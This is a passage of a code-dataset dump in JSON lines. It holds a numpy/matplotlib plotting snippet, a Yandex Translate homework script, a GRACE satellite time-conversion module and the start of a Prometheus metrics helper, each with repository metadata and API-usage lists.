"usage_type": "name"}, {"api_name": "numpy.array", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 300, "usage_type": "call"}, {"api_name": "os.path", "line_number": 300, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 304, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}]}
+{"seq_id": "5197869489", "text": "import matplotlib.pyplot as plot\nimport numpy as np\n\nx = np.arange(0, 10, 0.1)\ny = np.cos(1*x)\nz = np.cos(3*x)\n\nplot.plot(x,y)\nplot.plot(x,z)\nplot.show()\n\n", "repo_name": "esineokov/ml", "sub_path": "math/lesson/1/4.py", "file_name": "4.py", "file_ext": "py", "file_size_in_byte": 155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.arange", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}]}
+{"seq_id": "34211031227", "text": "import requests\n# документация https://yandex.ru/dev/translate/doc/dg/reference/translate-docpage/\n\nAPI_KEY = ''\nURL = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\n\ndef translate_it(text, lang, to_lang):\n \"\"\"\n https://translate.yandex.net/api/v1.5/tr.json/translate ?\n key=\n & text=<переводимый текст>\n & lang=<направление перевода>\n & [format=<формат текста>]\n & [options=<опции перевода>]\n & [callback=<имя callback-функции>]\n :param to_lang:\n :return:\n \"\"\"\n\n params = {\n 'key': API_KEY,\n 'text': text,\n 'lang': '{}-{}'.format(lang, to_lang),\n }\n\n response = requests.get(URL, params=params)\n json_ = response.json()\n return ''.join(json_['text'])\n\n\n# print(translate_it('В настоящее время доступна единственная опция — признак включения в ответ автоматически определенного языка переводимого текста. \n# Этому соответствует значение 1 этого параметра.', 'no'))\n\ndef open_txt(file_name):\n with open(file_name, 'r', encoding='utf-8') as f:\n data = [l.strip() for l in f]\n return data\n\ndef write_txt(file_name, data):\n with open(file_name, 'w', encoding='utf-8') as f:\n f.write(data)\n\n\ntranslated_data_de = translate_it(open_txt('DE.txt'), 'de', 'ru')\nprint(translated_data_de)\nwrite_txt('TranslatedDE.txt', translated_data_de)\n\ntranslated_data_es = translate_it(open_txt('ES.txt'), 'es', 'ru')\nprint(translated_data_es)\nwrite_txt('TranslatedES.txt', translated_data_es)\n\ntranslated_data_fr = translate_it(open_txt('FR.txt'), 'fr', 'ru')\nprint(translated_data_fr)\nwrite_txt('TranslatedFR.txt', translated_data_fr)\n\n\n", "repo_name": "m1amgn/ya_api_translate", "sub_path": "yandex_translate_hw.py", "file_name": "yandex_translate_hw.py", "file_ext": "py", "file_size_in_byte": 1879, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "18913289060", "text": "#!/usr/bin/env python\nu\"\"\"\ntime.py\nWritten by Tyler Sutterley (11/2021)\nUtilities for calculating time operations\n\nPYTHON DEPENDENCIES:\n numpy: Scientific Computing Tools For Python\n https://numpy.org\n dateutil: powerful extensions to datetime\n https://dateutil.readthedocs.io/en/stable/\n\nUPDATE HISTORY:\n Updated 11/2021: added function for calendar year (decimal) to Julian Day \n Updated 09/2021: add functions for converting to and from GRACE months\n Updated 05/2021: define int/float precision to prevent deprecation warning\n Updated 02/2021: added adjust_months function to fix special months cases\n Updated 01/2021: add date parser for cases when only a date and no units\n Updated 12/2020: merged with convert_julian and convert_calendar_decimal\n added calendar_days routine to get number of days per month\n Updated 09/2020: parse date strings \"time-units since yyyy-mm-dd hh:mm:ss\"\n Updated 08/2020: added NASA Earthdata routines for downloading from CDDIS\n Written 07/2020\n\"\"\"\nimport datetime\nimport numpy as np\nimport dateutil.parser\n\n#-- PURPOSE: parse a date string into epoch and units scale\ndef parse_date_string(date_string):\n \"\"\"\n parse a date string of the form time-units since yyyy-mm-dd hh:mm:ss\n\n Arguments\n ---------\n date_string: time-units since yyyy-mm-dd hh:mm:ss\n\n Returns\n -------\n epoch of delta time\n multiplication factor to convert to seconds\n \"\"\"\n #-- try parsing the original date string as a date\n try:\n epoch = dateutil.parser.parse(date_string)\n except ValueError:\n pass\n else:\n #-- return the epoch (as list)\n return (datetime_to_list(epoch),0.0)\n #-- split the date string into units and epoch\n units,epoch = split_date_string(date_string)\n conversion_factors = {'microseconds': 1e-6,'microsecond': 1e-6,\n 'microsec': 1e-6,'microsecs': 1e-6,\n 'milliseconds': 1e-3,'millisecond': 1e-3,'millisec': 1e-3,\n 'millisecs': 1e-3,'msec': 1e-3,'msecs': 1e-3,'ms': 1e-3,\n 'seconds': 1.0,'second': 1.0,'sec': 1.0,'secs': 1.0,'s': 1.0,\n 'minutes': 60.0,'minute': 60.0,'min': 60.0,'mins': 60.0,\n 'hours': 3600.0,'hour': 3600.0,'hr': 3600.0,\n 'hrs': 3600.0,'h': 3600.0,\n 'day': 86400.0,'days': 86400.0,'d': 86400.0}\n if units not in conversion_factors.keys():\n raise ValueError('Invalid units: {0}'.format(units))\n #-- return the epoch (as list) and the time unit conversion factors\n return (datetime_to_list(epoch),conversion_factors[units])\n\n#-- PURPOSE: split a date string into units and epoch\ndef split_date_string(date_string):\n \"\"\"\n split a date string into units and epoch\n\n Arguments\n ---------\n date_string: time-units since yyyy-mm-dd hh:mm:ss\n \"\"\"\n try:\n units,_,epoch = date_string.split(None,2)\n except ValueError:\n raise ValueError('Invalid format: {0}'.format(date_string))\n else:\n return (units.lower(),dateutil.parser.parse(epoch))\n\n#-- PURPOSE: convert a datetime object into a list\ndef datetime_to_list(date):\n \"\"\"\n convert a datetime object into a list [year,month,day,hour,minute,second]\n\n Arguments\n ---------\n date: datetime object\n \"\"\"\n return [date.year,date.month,date.day,date.hour,date.minute,date.second]\n\n#-- PURPOSE: Adjust GRACE/GRACE-FO months to fix \"Special Cases\"\ndef adjust_months(grace_month):\n \"\"\"\n Adjust estimated GRACE/GRACE-FO months to fix \"Special Cases\"\n\n Arguments\n ---------\n grace_month: GRACE/GRACE-FO months\n\n The \"Special Months\" (Nov 2011, Dec 2011 and April 2012) with\n Accelerometer shutoffs make the relation between month number\n and date more complicated as days from other months are used\n For CSR and GFZ: Nov 2011 (119) is centered in Oct 2011 (118)\n For JPL: Dec 2011 (120) is centered in Jan 2012 (121)\n For all: May 2015 (161) is centered in Apr 2015 (160)\n For GSFC: Oct 2018 (202) is centered in Nov 2018 (203)\n \"\"\"\n #-- verify dimensions\n grace_month = np.atleast_1d(grace_month)\n #-- number of months\n nmon = len(grace_month)\n #-- create temporary months object\n m = np.zeros_like(grace_month)\n #-- find unique months\n _,i,c = np.unique(grace_month,return_inverse=True,return_counts=True)\n #-- simple unique months case\n case1, = np.nonzero(c[i] == 1)\n m[case1] = grace_month[case1]\n #-- Special Months cases\n case2, = np.nonzero(c[i] == 2)\n #-- for each special case month\n for j in case2:\n # prior month, current month, subsequent 2 months\n mm1 = grace_month[j-1]\n mon = grace_month[j]\n mp1 = grace_month[j+1] if (j < (nmon-1)) else (mon + 1)\n mp2 = grace_month[j+2] if (j < (nmon-2)) else (mp1 + 1)\n #-- determine the months which meet the criteria need to be adjusted\n if (mon == (mm1 + 1)):\n #-- case where month is correct\n #-- but subsequent month needs to be +1\n m[j] = np.copy(grace_month[j])\n elif (mon == mm1) and (mon != m[j-1]):\n #-- case where prior month needed to be -1\n #-- but current month is correct\n m[j] = np.copy(grace_month[j])\n elif (mon == mm1):\n #-- case where month should be +1\n m[j] = grace_month[j] + 1\n elif (mon == mp1) and ((mon == (mm1 + 2)) or (mp2 == (mp1 + 1))):\n #-- case where month should be -1\n m[j] = grace_month[j] - 1\n #-- update months and remove singleton dimensions if necessary\n return np.squeeze(m)\n\n#-- PURPOSE: convert calendar dates to GRACE/GRACE-FO months\ndef calendar_to_grace(year,month=1,around=np.floor):\n \"\"\"\n Converts calendar dates to GRACE/GRACE-FO months\n\n Arguments\n ---------\n year: calendar year\n\n Keyword arguments\n -----------------\n month: calendar month\n around: method of rounding to nearest method\n\n Returns\n -------\n grace_month: GRACE/GRACE-FO month\n \"\"\"\n grace_month = around(12.0*(year - 2002.0)) + month\n return np.array(grace_month,dtype=int)\n\n#-- PURPOSE: convert GRACE/GRACE-FO months to calendar dates\ndef grace_to_calendar(grace_month):\n \"\"\"\n Converts GRACE/GRACE-FO months to calendar dates\n\n Arguments\n ---------\n grace_month: GRACE/GRACE-FO month\n\n Returns\n -------\n year: calendar year\n month: calendar month\n \"\"\"\n year = np.array(2002 + (grace_month-1)//12).astype(int)\n month = np.mod(grace_month-1,12) + 1\n return (year, month)\n\n#-- PURPOSE: convert calendar dates to Julian days\ndef calendar_to_julian(year_decimal):\n \"\"\"\n Converts calendar dates to Julian days\n\n Arguments\n ---------\n year: calendar year\n\n Returns\n -------\n JD: Julian Day (days since 01-01-4713 BCE at 12:00:00)\n \"\"\"\n #-- calculate year\n year = np.floor(year_decimal)\n #-- calculation of day of the year\n dpy = calendar_days(year).sum()\n DofY = dpy*(year_decimal % 1)\n #-- Calculation of the Julian date from year and DofY\n JD = np.array(367.0*year - np.floor(7.0*year/4.0) -\n np.floor(3.0*(np.floor((7.0*year - 1.0)/700.0) + 1.0)/4.0) +\n DofY + 1721058.5, dtype=np.float64)\n return JD\n\n#-- PURPOSE: gets the number of days per month for a given year\ndef calendar_days(year):\n \"\"\"\n Calculates the number of days per month for a given year\n\n Arguments\n ---------\n year: calendar year\n\n Returns\n -------\n dpm: number of days for each month\n \"\"\"\n #-- days per month in a leap and a standard year\n #-- only difference is February (29 vs. 28)\n dpm_leap = np.array([31,29,31,30,31,30,31,31,30,31,30,31],dtype=np.float64)\n dpm_stnd = np.array([31,28,31,30,31,30,31,31,30,31,30,31],dtype=np.float64)\n #-- Rules in the Gregorian calendar for a year to be a leap year:\n #-- divisible by 4, but not by 100 unless divisible by 400\n #-- True length of the year is about 365.2422 days\n #-- Adding a leap day every four years ==> average 365.25\n #-- Subtracting a leap year every 100 years ==> average 365.24\n #-- Adding a leap year back every 400 years ==> average 365.2425\n #-- Subtracting a leap year every 4000 years ==> average 365.24225\n m4 = (year % 4)\n m100 = (year % 100)\n m400 = (year % 400)\n m4000 = (year % 4000)\n #-- find indices for standard years and leap years using criteria\n if ((m4 == 0) & (m100 != 0) | (m400 == 0) & (m4000 != 0)):\n return dpm_leap\n elif ((m4 != 0) | (m100 == 0) & (m400 != 0) | (m4000 == 0)):\n return dpm_stnd\n\n#-- PURPOSE: convert times from seconds since epoch1 to time since epoch2\ndef convert_delta_time(delta_time, epoch1=None, epoch2=None, scale=1.0):\n \"\"\"\n Convert delta time from seconds since epoch1 to time since epoch2\n\n Arguments\n ---------\n delta_time: seconds since epoch1\n\n Keyword arguments\n -----------------\n epoch1: epoch for input delta_time\n epoch2: epoch for output delta_time\n scale: scaling factor for converting time to output units\n \"\"\"\n epoch1 = datetime.datetime(*epoch1)\n epoch2 = datetime.datetime(*epoch2)\n delta_time_epochs = (epoch2 - epoch1).total_seconds()\n #-- subtract difference in time and rescale to output units\n return scale*(delta_time - delta_time_epochs)\n\n#-- PURPOSE: calculate the delta time from calendar date\n#-- http://scienceworld.wolfram.com/astronomy/JulianDate.html\ndef convert_calendar_dates(year, month, day, hour=0.0, minute=0.0, second=0.0,\n epoch=(1992,1,1,0,0,0), scale=1.0):\n \"\"\"\n Calculate the time in time units since epoch from calendar dates\n\n Arguments\n ---------\n year: calendar month\n month: month of the year\n day: day of the month\n\n Keyword arguments\n -----------------\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n epoch: epoch for output delta_time\n scale: scaling factor for converting days to output units\n\n Returns\n -------\n delta_time: days since epoch\n \"\"\"\n #-- calculate date in Modified Julian Days (MJD) from calendar date\n #-- MJD: days since November 17, 1858 (1858-11-17T00:00:00)\n MJD = 367.0*year - np.floor(7.0*(year + np.floor((month+9.0)/12.0))/4.0) - \\\n np.floor(3.0*(np.floor((year + (month - 9.0)/7.0)/100.0) + 1.0)/4.0) + \\\n np.floor(275.0*month/9.0) + day + hour/24.0 + minute/1440.0 + \\\n second/86400.0 + 1721028.5 - 2400000.5\n epoch1 = datetime.datetime(1858,11,17,0,0,0)\n epoch2 = datetime.datetime(*epoch)\n delta_time_epochs = (epoch2 - epoch1).total_seconds()\n #-- return the date in days since epoch (or scaled to units)\n return scale*np.array(MJD - delta_time_epochs/86400.0,dtype=np.float64)\n\n#-- PURPOSE: Converts from calendar dates into decimal years\ndef convert_calendar_decimal(year, month, day=None, hour=None, minute=None,\n second=None, DofY=None):\n \"\"\"\n Converts from calendar date into decimal years taking into\n account leap years\n\n Dershowitz, N. and E.M. Reingold. 2008. Calendrical Calculations.\n Cambridge: Cambridge University Press.\n\n Arguments\n ---------\n year: calendar year\n month: calendar month\n\n Keyword arguments\n -----------------\n day: day of the month\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n DofY: day of the year (January 1 = 1)\n\n Returns\n -------\n t_date: date in decimal-year format\n \"\"\"\n\n #-- number of dates\n n_dates = len(np.atleast_1d(year))\n\n #-- create arrays for calendar date variables\n cal_date = {}\n cal_date['year'] = np.zeros((n_dates))\n cal_date['month'] = np.zeros((n_dates))\n cal_date['day'] = np.zeros((n_dates))\n cal_date['hour'] = np.zeros((n_dates))\n cal_date['minute'] = np.zeros((n_dates))\n cal_date['second'] = np.zeros((n_dates))\n #-- day of the year\n cal_date['DofY'] = np.zeros((n_dates))\n\n #-- remove singleton dimensions and use year and month\n cal_date['year'][:] = np.squeeze(year)\n cal_date['month'][:] = np.squeeze(month)\n\n #-- create output date variable\n t_date = np.zeros((n_dates))\n\n #-- days per month in a leap and a standard year\n #-- only difference is February (29 vs. 28)\n dpm_leap=np.array([31,29,31,30,31,30,31,31,30,31,30,31], dtype=np.float64)\n dpm_stnd=np.array([31,28,31,30,31,30,31,31,30,31,30,31], dtype=np.float64)\n\n #-- Rules in the Gregorian calendar for a year to be a leap year:\n #-- divisible by 4, but not by 100 unless divisible by 400\n #-- True length of the year is about 365.2422 days\n #-- Adding a leap day every four years ==> average 365.25\n #-- Subtracting a leap year every 100 years ==> average 365.24\n #-- Adding a leap year back every 400 years ==> average 365.2425\n #-- Subtracting a leap year every 4000 years ==> average 365.24225\n m4 = (cal_date['year'] % 4)\n m100 = (cal_date['year'] % 100)\n m400 = (cal_date['year'] % 400)\n m4000 = (cal_date['year'] % 4000)\n #-- find indices for standard years and leap years using criteria\n leap, = np.nonzero((m4 == 0) & (m100 != 0) | (m400 == 0) & (m4000 != 0))\n stnd, = np.nonzero((m4 != 0) | (m100 == 0) & (m400 != 0) | (m4000 == 0))\n\n #-- calculate the day of the year\n if DofY is not None:\n #-- if entered directly as an input\n #-- remove 1 so day 1 (Jan 1st) = 0.0 in decimal format\n cal_date['DofY'][:] = np.squeeze(DofY)-1\n else:\n #-- use calendar month and day of the month to calculate day of the year\n #-- month minus 1: January = 0, February = 1, etc (indice of month)\n #-- in decimal form: January = 0.0\n month_m1 = np.array(cal_date['month'],dtype=np.int64) - 1\n\n #-- day of month\n if day is not None:\n #-- remove 1 so 1st day of month = 0.0 in decimal format\n cal_date['day'][:] = np.squeeze(day)-1.0\n else:\n #-- if not entering days as an input\n #-- will use the mid-month value\n cal_date['day'][leap] = dpm_leap[month_m1[leap]]/2.0\n cal_date['day'][stnd] = dpm_stnd[month_m1[stnd]]/2.0\n\n #-- create matrix with the lower half = 1\n #-- this matrix will be used in a matrix multiplication\n #-- to calculate the total number of days for prior months\n #-- the -1 will make the diagonal == 0\n #-- i.e. first row == all zeros and the\n #-- last row == ones for all but the last element\n mon_mat=np.tri(12,12,-1)\n #-- using a dot product to calculate total number of days\n #-- for the months before the input date\n #-- basically is sum(i*dpm)\n #-- where i is 1 for all months < the month of interest\n #-- and i is 0 for all months >= the month of interest\n #-- month of interest is zero as the exact days will be\n #-- used to calculate the date\n\n #-- calculate the day of the year for leap and standard\n #-- use total days of all months before date\n #-- and add number of days before date in month\n cal_date['DofY'][stnd] = cal_date['day'][stnd] + \\\n np.dot(mon_mat[month_m1[stnd],:],dpm_stnd)\n cal_date['DofY'][leap] = cal_date['day'][leap] + \\\n np.dot(mon_mat[month_m1[leap],:],dpm_leap)\n\n #-- hour of day (else is zero)\n if hour is not None:\n cal_date['hour'][:] = np.squeeze(hour)\n\n #-- minute of hour (else is zero)\n if minute is not None:\n cal_date['minute'][:] = np.squeeze(minute)\n\n #-- second in minute (else is zero)\n if second is not None:\n cal_date['second'][:] = np.squeeze(second)\n\n #-- calculate decimal date\n #-- convert hours, minutes and seconds into days\n #-- convert calculated fractional days into decimal fractions of the year\n #-- Leap years\n t_date[leap] = cal_date['year'][leap] + \\\n (cal_date['DofY'][leap] + cal_date['hour'][leap]/24. + \\\n cal_date['minute'][leap]/1440. + \\\n cal_date['second'][leap]/86400.)/np.sum(dpm_leap)\n #-- Standard years\n t_date[stnd] = cal_date['year'][stnd] + \\\n (cal_date['DofY'][stnd] + cal_date['hour'][stnd]/24. + \\\n cal_date['minute'][stnd]/1440. + \\\n cal_date['second'][stnd]/86400.)/np.sum(dpm_stnd)\n\n return t_date\n\n#-- PURPOSE: Converts from Julian day to calendar date and time\ndef convert_julian(JD, ASTYPE=None, FORMAT='dict'):\n \"\"\"\n Converts from Julian day to calendar date and time\n\n Translated from caldat in \"Numerical Recipes in C\", by William H. Press,\n Brian P. Flannery, Saul A. Teukolsky, and William T. Vetterling.\n Cambridge University Press, 1988 (second printing).\n Hatcher, D. A., \"Simple Formulae for Julian Day Numbers and Calendar Dates\",\n Quarterly Journal of the Royal Astronomical Society, 25(1), 1984.\n\n\n Arguments\n ---------\n JD: Julian Day (days since 01-01-4713 BCE at 12:00:00)\n\n Keyword arguments\n -----------------\n ASTYPE: convert output to variable type\n FORMAT: format of output variables\n 'dict': dictionary with variable keys\n 'tuple': tuple with variable order YEAR,MONTH,DAY,HOUR,MINUTE,SECOND\n 'zip': aggregated variable sets\n\n Returns\n -------\n year: calendar year\n month: calendar month\n day: day of the month\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n \"\"\"\n\n #-- convert to array if only a single value was imported\n if (np.ndim(JD) == 0):\n JD = np.atleast_1d(JD)\n SINGLE_VALUE = True\n else:\n SINGLE_VALUE = False\n\n JDO = np.floor(JD + 0.5)\n C = np.zeros_like(JD)\n #-- calculate C for dates before and after the switch to Gregorian\n IGREG = 2299161.0\n ind1, = np.nonzero(JDO < IGREG)\n C[ind1] = JDO[ind1] + 1524.0\n ind2, = np.nonzero(JDO >= IGREG)\n B = np.floor((JDO[ind2] - 1867216.25)/36524.25)\n C[ind2] = JDO[ind2] + B - np.floor(B/4.0) + 1525.0\n #-- calculate coefficients for date conversion\n D = np.floor((C - 122.1)/365.25)\n E = np.floor((365.0 * D) + np.floor(D/4.0))\n F = np.floor((C - E)/30.6001)\n #-- calculate day, month, year and hour\n DAY = np.floor(C - E + 0.5) - np.floor(30.6001*F)\n MONTH = F - 1.0 - 12.0*np.floor(F/14.0)\n YEAR = D - 4715.0 - np.floor((7.0+MONTH)/10.0)\n HOUR = np.floor(24.0*(JD + 0.5 - JDO))\n #-- calculate minute and second\n G = (JD + 0.5 - JDO) - HOUR/24.0\n MINUTE = np.floor(G*1440.0)\n SECOND = (G - MINUTE/1440.0) * 86400.0\n\n #-- convert all variables to output type (from float)\n if ASTYPE is not None:\n YEAR = YEAR.astype(ASTYPE)\n MONTH = MONTH.astype(ASTYPE)\n DAY = DAY.astype(ASTYPE)\n HOUR = HOUR.astype(ASTYPE)\n MINUTE = MINUTE.astype(ASTYPE)\n SECOND = SECOND.astype(ASTYPE)\n\n #-- if only a single value was imported initially: remove singleton dims\n if SINGLE_VALUE:\n YEAR = YEAR.item(0)\n MONTH = MONTH.item(0)\n DAY = DAY.item(0)\n HOUR = HOUR.item(0)\n MINUTE = MINUTE.item(0)\n SECOND = SECOND.item(0)\n\n #-- return date variables in output format (default python dictionary)\n if (FORMAT == 'dict'):\n return dict(year=YEAR, month=MONTH, day=DAY,\n hour=HOUR, minute=MINUTE, second=SECOND)\n elif (FORMAT == 'tuple'):\n return (YEAR, MONTH, DAY, HOUR, MINUTE, SECOND)\n elif (FORMAT == 'zip'):\n return zip(YEAR, MONTH, DAY, HOUR, MINUTE, SECOND)\n", "repo_name": "geodeepak/GRACE_HYDL", "sub_path": "gravity_toolkit/time.py", "file_name": "time.py", "file_ext": "py", "file_size_in_byte": 19484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dateutil.parser.parser.parse", "line_number": 45, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 45, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 45, "usage_type": "name"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 81, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 81, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.atleast_1d", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 209, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 227, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 228, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 261, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 296, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 298, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 302, "usage_type": "attribute"}, {"api_name": "numpy.atleast_1d", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 337, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 355, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 356, "usage_type": "attribute"}, {"api_name": "numpy.nonzero", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 382, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.tri", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.ndim", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 481, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 486, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 490, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 493, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 497, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 502, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 503, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 506, "usage_type": "call"}]}
+{"seq_id": "26526599687", "text": "import time\nimport socket\nfrom functools import wraps\n\nfrom prometheus_client import Gauge, Histogram, Counter\n\n\nHOST_NAME = socket.gethostname()\n\n\ndef setup_histogram(*histograms):\n def wrapper(func):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n start = time.time()\n try:\n return func(*args, **kwargs)\n finally:\n for h in histograms:\n h.labels(hostname=HOST_NAME).observe(time.time() - start)\n\n return _wrapper\n\n return wrapper\n\n\ndef setup_counter(*counters):\n def wrapper(func):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n for c in counters:\n c.inc(1)\n return func(*args, **kwargs)\n\n return _wrapper\n\n return wrapper\n\n\n# taskflow metrics\nTASKFLOW_TIMEOUT_NODES_NUMBER = Gauge(\n \"taskflow_timeout_nodes_number\", \"amount of timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_RUNNING_NODES_NUMBER = Gauge(\n \"taskflow_running_nodes_number\", \"amount of running nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_TIMEOUT_NODES_SCANNING_TIME = Histogram(\n \"taskflow_timeout_nodes_scanning_time\", \"time to scan timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_TIMEOUT_NODES_PROCESSING_TIME = Histogram(\n \"taskflow_timeout_nodes_processing_time\", \"time to process timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_NODE_AUTO_RETRY_TASK_DURATION = Histogram(\n \"taskflow_node_auto_retry_task_duration\", \"time to process node auto retry task\", labelnames=[\"hostname\"]\n)\nTASKFLOW_NODE_AUTO_RETRY_LOCK_ACCUIRE_FAIL = Counter(\n \"taskflow_node_auto_retry_lock_accuire_fail\", \"node auto retry lock 